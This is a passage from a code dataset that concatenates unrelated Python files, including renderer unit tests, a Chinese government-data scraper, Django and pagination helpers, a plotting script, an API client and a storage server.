vertices.cuda()\n faces = faces.cuda()\n textures = textures.cuda()\n\n # create renderer\n renderer = nr.Renderer()\n renderer.camera.position = self.position\n renderer.camera.image_size = 256\n renderer.anti_aliasing = False\n\n # render\n images = renderer(vertices, faces, textures)\n images = images.detach().cpu().numpy()\n image = images[2]\n image = image.transpose((1, 2, 0))\n\n image = (image * 255).astype(np.uint8)\n\n imsave(os.path.join(data_dir, 'test_rasterize1.png'), image)\n\n def test_forward_case2(self):\n \"\"\"Rendering a teapot with anti-aliasing and another viewpoint.\"\"\"\n\n # load teapot\n vertices, faces, textures = utils.load_teapot_batch()\n vertices = vertices.cuda()\n faces = faces.cuda()\n textures = textures.cuda()\n\n # create renderer\n renderer = nr.Renderer()\n p = [1, 1, -2.7]\n renderer.camera.position = torch.tensor(p).view(1, 1, 3).expand(4, 1, 3)\n renderer.camera.rotation = rotation_from_look_at(p).expand(4, 3, 3)\n\n # render\n images = renderer(vertices, faces, textures)\n images = images.detach().cpu().numpy()\n image = images[2]\n image = image.transpose((1, 2, 0))\n\n image = (image * 255).astype(np.uint8)\n imsave(os.path.join(data_dir, 'test_rasterize2.png'), image)\n\n def test_forward_case3(self):\n \"\"\"Whether a silhouette by neural renderer matches that by Blender.\"\"\"\n\n # load teapot\n vertices, faces, textures = utils.load_teapot_batch()\n vertices = vertices.cuda()\n faces = faces.cuda()\n textures = textures.cuda()\n\n # create renderer\n renderer = nr.Renderer()\n renderer.camera.position = self.position\n renderer.camera.image_size = 256\n renderer.anti_aliasing = False\n renderer.light_intensity_ambient = 1.0\n renderer.light_intensity_directional = 0.0\n\n images = renderer(vertices, faces, textures)\n images = images.detach().cpu().numpy()\n image = images[2].mean(0)\n\n # load reference image by blender\n ref = imread(os.path.join(data_dir, 'teapot_blender.png'))\n ref = (ref.min(axis=-1) != 255).astype(np.float32)\n\n assert(np.allclose(ref, image))\n\n def test_backward_case1(self):\n \"\"\"Backward if non-zero gradient is out of a face.\"\"\"\n\n vertices = [\n [0.8, 0.8, 1.],\n [0.0, -0.5, 1.],\n [0.2, -0.4, 1.]]\n faces = [[0, 1, 2]]\n pxi = 35\n pyi = 25\n grad_ref = [\n [1.6725862, -0.26021874, 0.],\n [1.41986704, -1.64284933, 0.],\n [0., 0., 0.],\n ]\n\n renderer = nr.Renderer()\n renderer.camera.position = self.position\n renderer.camera.image_size = 64\n renderer.anti_aliasing = False\n renderer.camera.perspective = False\n renderer.light_intensity_ambient = 1.0\n renderer.light_intensity_directional = 0.0\n\n vertices = torch.from_numpy(np.array(vertices, dtype=np.float32)).cuda()\n faces = torch.from_numpy(np.array(faces, dtype=np.int32)).cuda()\n textures = torch.ones(faces.shape[0], 4, 4, 4, 3, dtype=torch.float32).cuda()\n grad_ref = torch.from_numpy(np.array(grad_ref, dtype=np.float32)).cuda()\n vertices, faces, textures, grad_ref = utils.to_minibatch((vertices, faces, textures, grad_ref))\n vertices, faces, textures, grad_ref = vertices.cuda(), faces.cuda(), textures.cuda(), grad_ref.cuda()\n vertices.requires_grad = True\n images = renderer(vertices, faces, textures)\n images = torch.mean(images, dim=1)\n loss = torch.sum(torch.abs(images[:, pyi, pxi] - 1))\n loss.backward()\n\n assert(torch.allclose(vertices.grad, grad_ref, rtol=1e-2))\n\n def test_backward_case2(self):\n \"\"\"Backward if non-zero gradient is on a face.\"\"\"\n\n vertices = [\n [0.8, 0.8, 1.],\n [-0.5, -0.8, 1.],\n [0.8, -0.8, 1.]]\n faces = [[0, 1, 2]]\n pyi = 40\n pxi = 50\n grad_ref = [\n [0.98646867, 1.04628897, 0.],\n [-1.03415668, - 0.10403691, 0.],\n [3.00094461, - 1.55173182, 0.],\n ]\n\n renderer = nr.Renderer()\n renderer.position = self.position\n renderer.camera.image_size = 64\n renderer.anti_aliasing = False\n renderer.camera.perspective = False\n renderer.light_intensity_ambient = 1.0\n renderer.light_intensity_directional = 0.0\n\n vertices = torch.from_numpy(np.array(vertices, dtype=np.float32)).cuda()\n faces = torch.from_numpy(np.array(faces, dtype=np.int32)).cuda()\n textures = torch.ones(faces.shape[0], 4, 4, 4, 3, dtype=torch.float32).cuda()\n grad_ref = torch.from_numpy(np.array(grad_ref, dtype=np.float32)).cuda()\n vertices, faces, textures, grad_ref = utils.to_minibatch((vertices, faces, textures, grad_ref))\n vertices.requires_grad = True\n\n images = renderer(vertices, faces, textures)\n images = torch.mean(images, dim=1)\n loss = torch.sum(torch.abs(images[:, pyi, pxi]))\n loss.backward()\n\n assert(torch.allclose(vertices.grad, grad_ref, rtol=1e-2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_rasterize.py","file_name":"test_rasterize.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"65938183","text":"from urllib import request\nimport os\nimport time\nimport lxml\nimport lxml.html\nimport re\nimport json\nfrom urllib.parse import urljoin\nimport requests\nfrom lxml import etree\nimport cssselect\nimport urllib.request\nimport math\n\n\n\ndef url_open(url):\n res = request.Request(url) #发送请求\n res.add_header(\"User-Agent\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\") #打开网页并读取内容 使用浏览器访问\n html = request.urlopen(res,timeout = 60).read()#打开网页并读取\n return html #html里面为网页内容\n\ndef post_id(page,areaCode): #得到主干网页内容\n url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action' # 网址\n data = {}\n data['fn'] = 'getPowerList'\n data['areaCode'] = areaCode\n data['type'] = ''\n data['keyword'] = ''\n data['pageSize'] = '10'\n data['pageNum'] = str(page+1)\n data = urllib.parse.urlencode(data).encode('utf-8') # 转化data格式为\n res = request.urlopen(url, data)\n html = res.read().decode('utf-8')\n return html\n\n\ndef post_page(areaCode):\n url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n data = {}\n data['fn'] = 'getPowerList'\n data['areaCode'] = areaCode\n data['type'] = ''\n data['keyword'] = ''\n data['pageSize'] = '10'\n data['pageNum'] = '1'\n data = urllib.parse.urlencode(data).encode('utf-8')\n res = request.urlopen(url, data)\n htmlstr = res.read().decode('utf-8')\n html = re.findall(r'\"totalCount\":(\\d+?),\"',htmlstr)\n page = math.ceil(int(html[0])/10)\n return(page)\n\n\ndef post_main_id(page,areaCode):\n url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n data = {}\n data['fn'] = 'getPowerList'\n data['areaCode'] = areaCode\n data['type'] = ''\n data['keyword'] = ''\n data['pageSize'] = '10'\n data['pageNum'] = page\n data = urllib.parse.urlencode(data).encode('utf-8')\n res = request.urlopen(url, data)\n htmlstr = res.read().decode('utf-8')\n main_unid = re.findall(r'\"UNID\":\"(.+?)\"',htmlstr )\n name = re.findall(r'\"LIABILITISENAME\":\"(.+?)\"',htmlstr )\n return main_unid,name\na ,b = post_main_id(\"8\",\"C50CC497199113B0B75501D50329B327\")\npass\n\ndef post_Branch_id(areaCode,main_unid):#分支id\n url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n data = {}\n data['fn'] = 'getPowerSubByNameOther'\n data['areaCode'] = areaCode\n data['keyword'] = ''\n data['powerunids'] = main_unid\n data['stype'] = ''\n data = urllib.parse.urlencode(data).encode('utf-8')\n res = request.urlopen(url, data)\n htmlstr = res.read().decode('utf-8')\n return(htmlstr)\n\n\ndef arecode(url):#收集arecode\n htmlstr = url_open(url).decode(\"utf-8\") # 打开网页并解码,解码为网页可读取形式(charset)\n html = etree.HTML(htmlstr) # 转换成Xpath可以理解的格式\n arecode_id = html.xpath('//*[@id=\"deptDataList\"]/li/@id') # Xpath的使用 提取节点 找出网址\n for i in range(len(arecode_id)):\n arecode_id[i] = arecode_id[i][5:]\n return(arecode_id)\n\ndef turn(li):\n out = \"\"\n for i in li:\n out = out +i +\",\"\n return out[:-2]\n\ndef getbsd(sbs):\n try:\n result_law = requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getLawInfo\",data={\"setBasisSummary\": sbs})\n except:\n print(\"v p n 掉 了\")\n result_law = requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getLawInfo\",data={\"setBasisSummary\": sbs})\n result_law_j = result_law.json()\n result = list()\n if result_law_j[\"state\"] ==1:\n for i in range(0,len(result_law_j[\"result\"])):\n for j in range(0,len(result_law_j[\"result\"][i]['articles'])):\n try:\n clause = result_law_j[\"result\"][i][\"articles\"][j][\"clause\"]\n except IndexError:\n clause = \"\"\n try:\n content = result_law_j[\"result\"][i][\"articles\"][j][\"content\"]\n except IndexError:\n content = \"\"\n try:\n law = result_law_j[\"result\"][i][\"lawName\"]\n except :\n law = \"\"\n result.append(\n {\n \"clause\":clause,\n \"law\":law,\n \"content\":content\n }\n )\n return result\n\n\ndef main():\n num = 0\n rightType = [\"行政许可\", \"行政处罚\", \"行政强制\", \"行政征收\", \"行政裁决\", \"行政确认\", \"行政给付\", \"行政奖励\", \"行政检查\", '行政服务' ,'内部审批','其他职责事项', '行政征用',\"其他行政权力\"]\n rightType_code = ['XK', 'CF','QZ','ZS','CJ', 'QR', 'GF','JL', 'JC','FW', 'NS', 'QL', 'ZY', 'QT']\n rightcode = {}\n for i in range(14):\n rightcode[rightType_code[i]] = rightType[i]\n os.chdir('C:/Users/Administrator/Desktop/')# 设置系统路径\n with open(\"福建3.json\",\"w\",encoding = \"utf-8\") as json_file: #打开文件\"海口1.json\"\n url = 'http://www.fjbs.gov.cn/LiabilitiseAction.action'\n arecode_id = arecode(url)\n for i in range(26,len(arecode_id)):#i为每个arecode\n pages = post_page(arecode_id[i])#得到页码\n print(\"一共 \",pages,\" 页\")\n for page in range(pages):\n print(\"page\",page)\n html_1 = post_id(page,arecode_id[i])#每个主干网页内容\n main_unid,rightName = post_main_id(page, arecode_id[i])\n for j in range(len(main_unid)):\n if rightName[j] ==\"\\\",\":\n continue\n url = \"http://www.fjbs.gov.cn/LiabilitiseAction.action?fn=getPowerDetail&powerunid=\"+main_unid[j]\n html = url_open(url).decode()\n html = lxml.html.fromstring(html)\n data = html.cssselect('td')\n if len(data) == 81:\n rightNo = data[64].text_content().replace(\" \",\"\").replace(\" \",\"\")\n rightType = data[62].text_content().replace(\" \",\"\").replace(\" \",\"\")\n competentDeptName = data[85-17].text_content().replace(\" \",\"\").replace(\" \",\"\")\n law = data[89-17].text_content().replace(\" \",\"\").replace(\" \",\"\")\n try:\n aa = requests.post('http://172.16.4.63:8080/intelligent/rightsApi/getCaseDomain',\n data={'competentDeptName': competentDeptName[j]}).json()\n caseDomainDescribe = aa['result']['industryShowName']\n caseDomain = aa['result']['industryName']\n except:\n caseDomain = \"\"\n caseDomainDescribe = \"\"\n dic = {\n \"rightNo\": rightNo,\n \"rightName\": rightName[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n \"rightType\": rightType,\n \"projectDecomposition\": \"\",\n \"executorName\": '',\n \"competentDeptName\": competentDeptName, #####\n \"undertakingAgency\": \"\", # 承办机构\n \"jointImpDept\": \"\",\n \"timeLimit\": \"\",\n \"accessWay\": \"\",\n \"complaintTel\": \"\",\n \"undertakingUser\": \"\",\n \"consultationTel\": \"\",\n \"setBasisSummary\": law.replace(\"\\\\n\",'').replace(\"\\n\",''),\n \"setBasis\": law.replace(\"\\\\n\",'').replace(\"\\n\",''),\n \"feeBasis\": \"\",\n \"law\": \"\",\n \"article\": \"\",\n \"feeScale\": \"\",\n \"approveImpDoc\": \"\",\n \"cityCode\": \"350000\", #######################################各市不同\n \"geoname\": \"福建\",\n \"sourceUrl\": url,\n \"caseDomain\": caseDomain,\n \"caseDomainDescribe\": caseDomainDescribe,\n \"basisSummaryDefinition\": getbsd(law.replace(\"\\\\n\",'').replace(\"\\n\",'')),\n \"uniqueId\": str(requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getUniqid\",\n data={'uniqueidStr': \"350000\" + rightNo}).json()[\n \"result\"])\n }\n num += 1\n print(num)\n json.dump(dic, json_file)\n json_file.write(\"\\n\")\n main_unid = turn(main_unid)\n html_2 = post_Branch_id(arecode_id[i],main_unid)\n law = re.findall(r'\"ACCORDING\":\"(.+?){0,1}\",\"',html_2)\n citycode = re.findall(r'\"DEPTCODE\":\"(\\d+?){0,1}\"', html_2)\n executorName = re.findall(r'\"EXECUTORCOMMON\":\"(.+?){0,1}\"', html_2)\n competentDeptName = re.findall(r'\"DEPTNAME\":\"(.+?){0,1}\"', html_2)\n uniqueId = re.findall(r'\"UNID\":\"(.+?){0,1}\"', html_2)\n rightType = re.findall(r'\"STYPE\":\"(\\w+?){0,1}\"', html_2)\n rightName = re.findall(r'\"SUBNAME\":\"(.+?){0,1}\",\"', html_2)\n rightNo = re.findall(r'\"MATTERCODE\":\"(.+?){0,1}\"',html_2)\n for j in range(len(rightType)):\n if rightName[j] ==\"\\\",\":\n continue\n try:\n aa = requests.post('http://172.16.4.63:8080/intelligent/rightsApi/getCaseDomain',\n data={'competentDeptName': competentDeptName[j]}).json()\n caseDomainDescribe = aa['result']['industryShowName']\n caseDomain = aa['result']['industryName']\n except:\n caseDomain = \"\"\n caseDomainDescribe = \"\"\n dic = {\n \"rightNo\": rightNo[j],\n \"rightName\": rightName[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n \"rightType\": rightcode[rightType[j]],\n \"projectDecomposition\": \"\",\n \"executorName\": executorName[j],\n \"competentDeptName\": competentDeptName[j], #####\n \"undertakingAgency\": \"\", # 承办机构\n \"jointImpDept\": \"\",\n \"timeLimit\": \"\",\n \"accessWay\": \"\",\n \"complaintTel\": \"\",\n \"undertakingUser\": \"\",\n \"consultationTel\": \"\",\n \"setBasisSummary\": law[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n \"setBasis\": law[j].replace(\"\\\\n\",'').replace(\"\\n\",''),\n \"feeBasis\": \"\",\n \"law\": \"\",\n \"article\": \"\",\n \"feeScale\": \"\",\n \"approveImpDoc\": \"\",\n \"cityCode\": \"350000\", #######################################各市不同\n \"geoname\": \"福建\",\n \"sourceUrl\": \"http://www.fjbs.gov.cn/LiabilitiseAction.action?fn=getPowerDetail&powerunid=\"+uniqueId[j],\n \"caseDomain\": caseDomain,\n \"caseDomainDescribe\": caseDomainDescribe,\n \"basisSummaryDefinition\": getbsd(law[j].replace(\"\\\\n\",'').replace(\"\\n\",'')),\n \"uniqueId\": str(requests.post(\"http://172.16.4.63:8080/intelligent/rightsApi/getUniqid\",\n data={'uniqueidStr': \"350000\" + rightNo[j]}).json()[\n \"result\"])\n }\n if dic[\"executorName\"] == \"\\\",\":\n dic[\"executorName\"] = \"\"\n num += 1\n print(num)\n json.dump(dic, json_file)\n json_file.write(\"\\n\")\n #得到所有枝干网页内容\n\n pass\nmain()","sub_path":"venv/Include/福建.py","file_name":"福建.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"552504399","text":"import re\nfrom datetime import date, datetime, timedelta\n\nfrom standup.database.helpers import paginate as _paginate\n\n\ndef paginate(statuses, page=1, startdate=None, enddate=None):\n from standup.apps.status.models import Status\n if startdate:\n statuses = statuses.filter(Status.created >= startdate)\n if enddate:\n statuses = statuses.filter(Status.created <= enddate)\n return _paginate(statuses, int(page))\n\n\ndef startdate(request):\n dates = request.args.get('dates')\n day = request.args.get('day')\n if dates == '7d':\n return date.today() - timedelta(days=7)\n elif dates == 'today':\n return date.today()\n elif isday(day):\n return get_day(day)\n return None\n\n\ndef enddate(request):\n day = request.args.get('day')\n if isday(day):\n return get_day(day) + timedelta(days=1)\n return None\n\n\ndef isday(day):\n return day and re.match('^\\d{4}-\\d{2}-\\d{2}$', day)\n\n\ndef get_day(day):\n return datetime.strptime(day, '%Y-%m-%d')\n","sub_path":"standup/apps/status/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"157078576","text":"from django.contrib.auth.models import User\nfrom django.utils.translation import ugettext_lazy\nfrom django.core.management.base import BaseCommand\nfrom django.conf import settings\n\nfrom onadata.apps.logger.models import Instance, XForm\nfrom onadata.libs.utils.model_tools import queryset_iterator\n\n\nclass Command(BaseCommand):\n args = ''\n help = ugettext_lazy(\"Sync account with '_id'\")\n\n def handle(self, *args, **kwargs):\n\n # username\n if args:\n users = User.objects.filter(username__contains=args[0])\n else:\n # All the accounts\n self.stdout.write(\"Fetching all the account {}\", ending='\\n')\n users = User.objects.exclude(\n username__iexact=settings.ANONYMOUS_DEFAULT_USERNAME\n )\n\n for user in queryset_iterator(users):\n self.add_id(user)\n\n def add_id(self, user):\n self.stdout.write(\"Syncing for account {}\".format(user.username),\n ending='\\n')\n xforms = XForm.objects.filter(user=user)\n\n count = 0\n failed = 0\n for instance in Instance.objects.filter(\n xform__downloadable=True, xform__in=xforms)\\\n .extra(where=['(\"logger_instance\".json->>%s) is null'],\n params=[\"_id\"]).iterator():\n try:\n instance.save()\n count += 1\n except Exception as e:\n failed += 1\n self.stdout.write(str(e), ending='\\n')\n pass\n\n self.stdout.write(\"Syncing for account {}. Done. Success {}, Fail {}\"\n .format(user.username, count, failed),\n ending='\\n')\n","sub_path":"onadata/apps/logger/management/commands/add_id.py","file_name":"add_id.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"51399542","text":"import matplotlib.pyplot as plt\r\nimport matplotlib.colors as colors\r\nimport numpy as np\r\n\r\nimport csv, glob, os, pandas\r\nfrom functools import reduce\r\n\r\nvar_Gc, var_logAge, var_M_H, var_m_ini, var_mu0, var_Av, var_comp, var_Mass, var_logL, var_logTe, var_logg, var_McoreTP, var_C_O, var_period0, var_period1, var_pmode, var_Mloss, var_tau1m, var_X, var_Y, var_Xc, var_Xn, var_Xo, var_Cexcess, var_Z, var_mbolmag, var_FUVmag, var_NUVmag, var_Umag, var_Bmag, var_Vmag, var_umag, var_gmag, var_rmag, var_imag, var_zmag, var_gP1mag, var_rP1mag, var_iP1mag, var_zP1mag, var_yP1mag, var_wP1mag, var_Gmag, var_G_BPmag, var_G_RPmag, var_Jmag, var_Hmag, var_Ksmag=range(48)\r\n\r\ncols=[var_logTe, var_logg, var_NUVmag, var_gmag, var_imag]\r\n[var_logTe, var_logg, var_NUVmag, var_gmag, var_imag]=range(len(cols))\r\n\r\ndef coords(line): return line.split(\"trioutput_b\")[1].split(\"binary\")[0].split(\"_l\")\r\n\r\ndef truncate_colormap(cmap, minval=0.0, maxval=1.0, n=256):\r\n new_cmap = colors.LinearSegmentedColormap.from_list(\r\n 'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),\r\n cmap(np.linspace(minval, maxval, n)))\r\n return new_cmap\r\n\r\n\r\n\r\ndef save_rows(filename, rows):\r\n np.save(filename, rows)\r\n\r\ndef load_rows(filename):\r\n return np.load(filename)\r\n\r\n\r\ndef extract_rows(files, m=None):\r\n # only process first m datasets to speedup processing\r\n if m==None: m=len(files)\r\n return np.vstack(pandas.io.parsers.read_csv(f, delimiter=\",\", skiprows=1, usecols=cols).values for f in files[:m])\r\n \r\n\r\ndef get_IFMR_data(IFMR, m=20):\r\n \"\"\"\r\n returns list of every row with that IFMR\r\n each row stored as a dict\r\n \"\"\"\r\n global datasets_dir, color_dir\r\n \r\n files = glob.glob(os.path.join(datasets_dir, \"*IFMR{}.csv\".format(IFMR)))\r\n \r\n rows = extract_rows(files, m=m)\r\n return rows\r\n \r\ndef make_color_plots(IFMR, rows, NUV_cutoff):\r\n col = rows[np.where(rows.T[var_NUVmag] <= NUV_cutoff)].T\r\n \r\n plt.clf()\r\n # vmin, vmax = range of logTe used to map a logTe value to a color w/ my colormap\r\n # manually set so the color scale doesn't change w/ the dataset\r\n plt.scatter(col[var_gmag]-col[var_imag], col[var_NUVmag]-col[var_gmag], c=col[var_logTe], \r\n marker=',', s=1,\r\n linewidth=0, edgecolors='', \r\n cmap=reduced_cmap, vmin=3.5, vmax=5)\r\n \r\n plt.title(\"POINT-LIKE, NUV mag $\\leq$ {}, IFMR {} 60-90N\".format(NUV_cutoff, IFMR))\r\n a=plt.gca()\r\n a.get_yaxis().set_tick_params(direction='out')\r\n a.get_xaxis().set_tick_params(direction='out')\r\n a.tick_params(which='both', \r\n labeltop='off', labelright='off',\r\n top='off', right='off')\r\n a.set_xlabel(\"g - i\")\r\n a.set_ylabel(\"NUV - g\")\r\n #a.set_xlim(-1.5, 4)\r\n #a.set_ylim(-1.5, 12)\r\n a.set_xlim(-1, 2)\r\n a.set_ylim(-1.5, 4)\r\n a.invert_yaxis()\r\n plt.savefig(os.path.join(color_dir, \"{} NUV cutuff {}\".format(IFMR, NUV_cutoff) + \".png\"), bbox_inches='tight', dpi=500)\r\n plt.show()\r\n \r\n\r\n\r\n#reduced_cmap = truncate_colormap(plt.cm.CMRmap, 0.2, 0.6)\r\nreduced_cmap = truncate_colormap(plt.cm.spectral, 1, 0)\r\n\r\ndatasets_dir = \"D:/Documents/Research/Astro/output/\"\r\ncolor_dir = \"D:/Documents/Research/Astro/color maps\"\r\n \r\n#for IFMR in (\"kalirai2008\", \"williams2007\", \"weideman2000\" ):\r\nfor IFMR in [\"williams2007\"]:\r\n \r\n # load datasets\r\n save_filename = os.path.join(datasets_dir, \"combined_{}\".format(IFMR))\r\n if 1:\r\n rows = get_IFMR_data(IFMR, m=None)\r\n save_rows(save_filename, rows)\r\n print(\"rows saved\")\r\n else:\r\n rows = load_rows(save_filename + \".npy\")\r\n \r\n #for NUV in range(19, 26, 2):\r\n make_color_plots(IFMR, rows, 19)\r\n \r\n","sub_path":"color_diagrams.py","file_name":"color_diagrams.py","file_ext":"py","file_size_in_byte":3744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"303090280","text":"\"\"\"\nService class\n------------------\nService object for interfacing with the Phenoteke API\n\n\"\"\"\n\nimport os\nimport logging\nfrom posixpath import join as urljoin\nfrom typing import Optional, List, Union, Dict\n\nfrom ...client import Client\nfrom ...services import BaseService\n\nSERVICE_PATH = \"phenoteke/api/v1\"\n\nlog = logging.getLogger(__file__)\n\nclass Service(BaseService):\n \"\"\"\n Phenoteke Service\n \"\"\"\n\n links: Dict = {}\n\n def __init__(self, client: Client, *args, **kwargs) -> None:\n super(Service, self).__init__(client, SERVICE_PATH, *args, **kwargs)\n\n def map_cids_to_ipns(\n self,\n site_id: str,\n study_id: str,\n cids: List[str],\n subcategory_id: Optional[str] = None,\n ) -> List:\n \"\"\"\n Get mapping from collaborator ids to ipns\n\n :param site_id: Site code\n :param study_id: Study code\n :param cids: List of collaborator ids\n :param subcategory_id: Optional sub category within study\n :return: List of {\"cid\": , \"ipn\": }\n :raises: ServerError\n \"\"\"\n uri = urljoin(\n self.session.url_from_endpoint(\"root\"),\n \"cids_to_ipns_mapping\",\n )\n result = []\n parts = int((len(cids)+4)/5)\n\n payload = {\n \"site_id\": site_id,\n \"study_id\": study_id,\n }\n if subcategory_id:\n payload[\"subcategory_id\"] = subcategory_id\n\n def list_split(l, parts):\n length = len(l)\n return [ l [i*length // parts: (i+1)*length // parts] for i in range(parts) ]\n\n for cid_parts in list_split(cids,parts):\n payload[\"cids\"] = cid_parts\n\n resp = self.session.post(uri, json=payload)\n resp.raise_for_status()\n data = resp.json()\n result.extend(data[\"data\"])\n\n return result\n\n","sub_path":"nextcode/services/phenoteke/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"468113401","text":"import sys\nfrom optparse import OptionParser\nfrom twisted.python import log\nfrom twisted.internet import reactor\n\nfrom generic.genericserver import FixedLengthMessageServer\nfrom generic.protocol import BinaryMessageProtocol\nfrom storage.handler import StorageRequestHandler\nfrom storage.storagedb import StorageDatabase\nfrom storage.admin import StorageAdminServer\n\nDEFAULT_DB_SIZE = 500*1024*1024 # 10mb, small for testing\n\nclass StorageServer(FixedLengthMessageServer):\n def __init__(self, options, args):\n super(StorageServer, self).__init__(options, args)\n self.factory.db = StorageDatabase(options.databasefile, options.databasesize)\n self.factory.db.start()\n self.factory.handlerClass = StorageRequestHandler\n self.factory.protocol = BinaryMessageProtocol\n self.factory.protocolVersion = 0b1\n self.factory.xor_server_connection = None\n\nif __name__ == '__main__':\n parser = OptionParser()\n StorageServer.addServerOptions(parser)\n \n parser.add_option(\"-d\", \"--db\", dest=\"databasefile\", default=\"storagedb.bin\", help=\"loctation of database file\", metavar=\"FILE\")\n parser.add_option(\"-s\", \"--dbsize\", dest=\"databasesize\", type=\"int\", default=DEFAULT_DB_SIZE, help=\"size of database in bytes\")\n \n parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\")\n \n parser.add_option(\"-a\", \"--adminport\", type=\"int\", dest=\"admin_port\", help=\"Port of admin server\")\n \n \n (options, args) = parser.parse_args()\n \n if options.verbose:\n log.startLogging(sys.stdout)\n \n server = StorageServer(options, args)\n server.listen()\n adminServer = StorageAdminServer(options, args, server)\n adminServer.listen()\n reactor.run()\n","sub_path":"Distributed Systems/src/storageserver.py","file_name":"storageserver.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"617574686","text":"n = int(input())\na = list(map(int, input().split()))\ntotal = sum(a)\nlimit = 10**9 + 10**9\nb = 0\nfor i in a[:-1]:\n b += i + i\n diff = abs(total - b)\n if limit > diff:\n limit = diff\nprint(limit)","sub_path":"Python_codes/p03659/s513257801.py","file_name":"s513257801.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"524081195","text":"import os\n\nimport platform\nimport logging\nimport psutil\n\n\ndef create_dirs(path):\n os.makedirs(os.path.join(path, 'snapshots/'))\n\n\ndef get_video_params():\n system = platform.system()\n\n if system == 'Windows':\n # give process higher priority\n import psutil\n import os\n p = psutil.Process(os.getpid())\n p.nice(psutil.REALTIME_PRIORITY_CLASS)\n return 'mp4v', '.mp4'\n elif system == 'Darwin':\n return 'mp4v', '.mov'\n elif system == 'Linux':\n return 'XVID', '.avi'\n\n\ndef next_test_dir(path):\n path = os.path.join(path, 'session')\n num = 0\n while os.path.exists(path + str(num)):\n num = num + 1\n test_dir = path + str(num) + '/'\n os.makedirs(test_dir)\n return test_dir\n\ndef is_latest():\n import subprocess\n try:\n current_commit_id = subprocess.check_output([\"git\", \"describe\", \"--always\"]).strip()\n\n remote_git = 'https://github.com/UpGado/polarized-laparoscope.git'\n remote_commit_id = subprocess.check_output([\"git\", \"ls-remote\", remote_git]).strip()\n\n same_id = remote_commit_id[:len(current_commit_id)] == current_commit_id\n return same_id\n except:\n return True\n\ndef enough_space():\n nbytes = psutil.disk_usage('.').free\n ngigabytes = nbytes / 2**(30)\n logging.info(f'Free space: {ngigabytes} GB')\n return ngigabytes > 200\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250021361","text":"# # By Steven Kha 2018\n\nimport pygame\npygame.init()\nfrom pygame.sprite import Sprite\n\nclass Right_Paddle(Sprite):\n\n def __init__(self, ai_settings, screen):\n \"\"\"Create the Right_Paddle and set its starting position.\"\"\"\n super(Right_Paddle, self).__init__()\n self.screen = screen\n self.ai_settings = ai_settings\n\n self.rect = pygame.Rect(0, 0, ai_settings.right_paddle_width,\n ai_settings.right_paddle_height)\n\n self.screen_rect = screen.get_rect()\n\n self.color = ai_settings.top_paddle_color\n\n self.height = float(ai_settings.right_paddle_height)\n\n #Right_Paddle starts at center right of screen\n self.rect.centery = self.screen_rect.centery\n self.rect.right = self.screen_rect.right\n #print(\"Reft Paddle position: \" + str(self.rect))\n\n # Store a decimal value for the ship's center.\n self.y = float(self.rect.centery)\n\n self.speed_factor = ai_settings.right_paddle_speed_factor\n\n # Movement flag for continuous movement\n self.moving_up = False\n self.moving_down = False\n\n def update(self, ai_settings, balls):\n \"\"\"Update the ship's position based on the movement flag.\"\"\"\n # Update the ship's center value, not the rect.\n for ball in balls.sprites():\n if ball.rect.centerx > ai_settings.right_reflex:\n self.y += (ai_settings.right_paddle_y_direction *\n ai_settings.right_paddle_speed_factor/ ai_settings.cpu_slow)\n\n else:\n self.y -= (ai_settings.right_paddle_y_direction *\n ai_settings.right_paddle_speed_factor/ ai_settings.cpu_slow)\n\n self.rect.y = self.y\n\n def check_edges(self):\n if self.rect.top < 0:\n return True\n elif self.rect.bottom > 800:\n return True\n\n def center_right_paddle(self):\n \"\"\"Center the ship on the screen.\"\"\"\n self.center = self.screen_rect.midright\n\n\n def draw_right_paddle(self):\n \"\"\"Draw the bullet to the screen.\"\"\"\n pygame.draw.rect(self.screen, self.color, self.rect)\n\n# By Steven Kha 2018","sub_path":"right_paddle.py","file_name":"right_paddle.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"443459651","text":"\"\"\"\nCode for particle tracking, designed for ROMS output with\nplaid lat, lon grids.\n\nThis program is a driver where you specify:\n- an experiment (ROMS run + release locations + other choices)\n- a release or set of releases within that experiment (start day, etc.)\n\nIt can be run on its own, or with command line arguments to facilitate\nlarge, automated jobs, for example from the terminal:\npython tracker_1.py -dtt 2 -ds 